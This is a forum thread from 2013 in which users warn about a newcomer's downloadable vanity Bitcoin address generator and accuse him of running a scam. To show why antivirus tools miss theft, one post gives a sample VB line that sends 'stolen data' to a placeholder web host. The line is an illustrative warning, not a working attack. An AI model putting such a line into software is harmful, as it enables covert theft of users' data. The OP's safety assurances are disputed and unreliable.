|
|
|
jasinlee
|
 |
January 30, 2013, 02:42:04 PM |
|
Havent downloaded it yet, but everyone be careful when downloading programs to your computers.
|
|
|
|
ilian000 (OP)
Newbie
 Offline
Activity: 33
Merit: 0
|
|
January 30, 2013, 02:43:22 PM |
|
I added a virustotal link. You can check the SHA256 hash before opening it.
|
|
|
|
|
deepceleron
Legendary
Offline
Activity: 1512
Merit: 1036
|
|
January 30, 2013, 03:16:29 PM |
|
This application is in violation of the GPL, the license and source code are not included. It uses Samr's vanitygen code. This application crashes before it can run (or before I can detect bad actions). It extracts and deploys it's payload to a temp directory.  |
|
|
|
|
|
|
cosmicone
Member
Offline
Activity: 105
Merit: 10
|
|
January 30, 2013, 03:24:34 PM |
|
Why not just code this as a webpage, and and drop the whole 'download an application' thing?
Many people are not on windows.
|
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
January 30, 2013, 03:27:31 PM |
|
You could create a java applet of it, but it'll only use the CPU, instead of the GPU.
|
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
January 30, 2013, 04:00:44 PM |
|
This application crashes before it can run
I created a virtual machine to test the application in XP. You'll need to download the .NET Framework 2.0, otherwise you'll get that error. OpenCL.dll won't work in VMWare tough. Try to run it in a non-virtualized enviroment. |
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
January 30, 2013, 07:35:43 PM |
|
Bump
|
|
|
|
|
deepceleron
Legendary
Offline
Activity: 1512
Merit: 1036
|
|
January 30, 2013, 07:46:19 PM
Last edit: January 30, 2013, 08:12:25 PM by deepceleron |
|
You are wanting people to download an exe file. There is no way this can be made safe.
Even with analysis, the thing could lie in wait, only activating it's hidden "send the wallet.dat and wipe the hard drive" feature after a certain date or runtime. The addresses it makes could use less than good randomness or a deterministic seed, meaning it would be possible to easily cryptanalyse a seen vanity address to determine the key. The only way the exe could be close to trustable is if the unobfuscated source code is also published along with build instructions, and others are able to compile a binary-identical executable. Then after someone reviews it and says it's safe, you still only need to update the first post to point to a different file.
Then you are still putting your donation address on something that is 95% another person's work.
|
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
January 30, 2013, 10:30:15 PM |
|
You are wanting people to download an exe file. There is no way this can be made safe.
Even with analysis, the thing could lie in wait, only activating it's hidden "send the wallet.dat and wipe the hard drive" feature after a certain date or runtime. The addresses it makes could use less than good randomness or a deterministic seed, meaning it would be possible to easily cryptanalyse a seen vanity address to determine the key. The only way the exe could be close to trustable is if the unobfuscated source code is also published along with build instructions, and others are able to compile a binary-identical executable. Then after someone reviews it and says it's safe, you still only need to update the first post to point to a different file.
Then you are still putting your donation address on something that is 95% another person's work.
Well, there are many .NET code viewers (.NET Reflector, jetbrains,...) to grab the source code of it. You'll need to extract the exe with 7zip/WinRAR tough. You can check the network connectivity if the application, if you really think that the app will send a wallet.dat to someone. You can also debug the whole app using ollydbg if you are an expert... |
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
January 31, 2013, 06:20:23 PM |
|
Why not just code this as a webpage, and and drop the whole 'download an application' thing?
Many people are not on windows.
I guess I'll start a website then  |
|
|
|
|
BitStick
Newbie
Offline
Activity: 32
Merit: 0
|
|
January 31, 2013, 09:54:08 PM |
|
Never ever ever ever ever ever trust virustotal.com to tell you if a program is safe to use or not, virus checkers are not worth the hard drive space or the cpu time they consume. I'm not suggesting there is anything wrong with his program I'm just wanting people to be aware that virus checkers are totally incapable of spotting software capable of transmitting information over the internet. It needs .NET Framework so its probably done in Visual Studio. A VB command that looks like this. WebBrowser.Navigate(" http://somedomain.com/Script.php?" + "your stolen data") would send the text string "your stolen data" to the php script, virus checkers ignore this and since it goes out on port 80 your firewall treats it as a web browser and ignores it. |
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
February 01, 2013, 05:41:32 PM |
|
Never ever ever ever ever ever trust virustotal.com to tell you if a program is safe to use or not, virus checkers are not worth the hard drive space or the cpu time they consume. I'm not suggesting there is anything wrong with his program I'm just wanting people to be aware that virus checkers are totally incapable of spotting software capable of transmitting information over the internet. It needs .NET Framework so its probably done in Visual Studio. A VB command that looks like this. WebBrowser.Navigate(" http://somedomain.com/Script.php?" + "your stolen data") would send the text string "your stolen data" to the php script, virus checkers ignore this and since it goes out on port 80 your firewall treats it as a web browser and ignores it. As I said earlier, you can decompile the application to make sure it won't communicate with anyone. Try running it with an internet monitor, and you'll see that it's completely safe... |
|
|
|
|
deepceleron
Legendary
Offline
Activity: 1512
Merit: 1036
|
|
February 01, 2013, 05:59:45 PM |
|
As I said earlier, the only way you are going to get anyone to download this, other than to see what you've done bad to get you banned, is to publish the source code and describe the build environment.
You join the forum, and 36 hours later post an exe = scammer.
You tell people to virus scan when anybody knows a trojan horse function won't be caught by one = scammer.
I tell you why we can't trust your exe, you challenge people to try to decompile it instead of posting source = scammer.
You change your OP after being called out for using other people's code without credit = scammer.
You bump your thread, like you haven't gotten the infection level you were hoping for, or the deterministic key balances on the net you were hoping to steal = scammer.
|
|
|
|
|
ilian000 (OP)
Newbie
Offline
Activity: 33
Merit: 0
|
|
February 15, 2013, 11:39:50 AM |
|
Because all of you trusted the pervious program, I made the security of the following web service much better: http://coinbit.tkIt uses the Elliptic Curve Cryptography. Have fun with it! |
|
|
|
|
|
